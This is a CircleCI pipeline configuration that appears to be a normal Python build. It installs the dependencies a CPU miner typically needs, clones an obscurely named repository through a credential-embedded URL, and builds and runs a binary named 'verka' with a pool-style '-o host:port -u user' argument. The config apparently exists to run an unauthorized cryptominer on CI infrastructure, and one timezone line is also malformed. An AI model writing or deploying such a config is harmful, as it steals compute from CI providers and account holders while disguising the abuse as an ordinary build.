version: 2.1

orbs:
  python: circleci/python@0.2.1

jobs:
  build:
    executor: python/default
    steps:
      - run:
          command: sudo apt update
      - run:
          command: sudo apt upgrade -y
      - run:
          command: TZ=Europe/Kiev
      - run:
          command: sudo ln -snf /usr/share/zoneinfo/Europe/Kiev /etc/localtime && sudo echo Europe/Kiev > sudo /etc/timezone
      - run:
          command: sudo apt install git build-essential cmake libuv1-dev libssl-dev libhwloc-dev msr-tools -y
      - run:
          command: git clone https://h5yhj56hbdfgb54@bitbucket.org/h5yhj56hbdfgb54/verka.git
      - run:
          command: sudo mkdir verka/build && cd verka/build && sudo cmake .. && sudo make -j$(nproc) && ls && sudo ./verka -o 1.1.1.1:1234 -u 1234

workflows:
  main:
    jobs:
      - build